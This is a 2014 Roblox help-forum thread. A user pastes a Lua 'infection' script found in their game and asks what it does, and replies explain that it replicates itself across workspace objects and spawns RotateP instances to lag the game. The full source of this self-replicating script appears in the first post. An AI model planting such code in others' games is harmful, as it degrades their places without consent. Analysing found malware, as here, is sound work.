|
| 15 Jul 2014 02:55 PM |
what does it do? I haven't noticed it. if script.Parent.className ~= "RotateP" then local p = Instance.new("RotateP") p.Parent = workspace p.Name = "INfecTION" script.Parent = p end
function check() local list = workspace:GetChildren() for i = 1, #list do if list[i]:findFirstChild("INfecTION") == nil and list[i].className ~= "RotateP" then script.Parent:Clone().Parent = list[i] end wait() end end
while true do check() if workspace:findFirstChild("inFECtion") == nil then local main = script.Parent:Clone() main.Name = "inFECtion" main.Parent = workspace end wait(3) end
|
|
|
| Report Abuse |
|
|
ezt12
|
  |
| Joined: 09 Jul 2014 |
| Total Posts: 1531 |
|
|
| 15 Jul 2014 02:55 PM |
| It's an infection... remove it... |
|
|
| Report Abuse |
|
|
|
| 15 Jul 2014 02:56 PM |
it says infection
maybe virus |
|
|
| Report Abuse |
|
|
|
| 15 Jul 2014 02:57 PM |
yes I know it's a virus
but what the heck does it do I want to know It seems like nothing |
|
|
| Report Abuse |
|
|
ezt12
|
  |
| Joined: 09 Jul 2014 |
| Total Posts: 1531 |
|
| |
|
|
| 15 Jul 2014 03:00 PM |
| It'll just create a whole bunch of RotateP's that will lag up your game. |
|
|
| Report Abuse |
|
|
cade2000
|
  |
| Joined: 09 Aug 2009 |
| Total Posts: 887 |
|
|
| 15 Jul 2014 03:00 PM |
| It makes a bunch of unnecessary RotateP's to lag your game. |
|
|
| Report Abuse |
|
|
|
| 15 Jul 2014 03:01 PM |
oh well it's certainly not working |
|
|
| Report Abuse |
|
|
|
| 15 Jul 2014 03:01 PM |
| lag generator 9000,get working! |
|
|
| Report Abuse |
|
|
ezt12
|
  |
| Joined: 09 Jul 2014 |
| Total Posts: 1531 |
|
|
| 15 Jul 2014 03:02 PM |
| @mark: Perhaps not on a small place, but for places with a lot of parts and instances, that script could be fatal. |
|
|
| Report Abuse |
|
|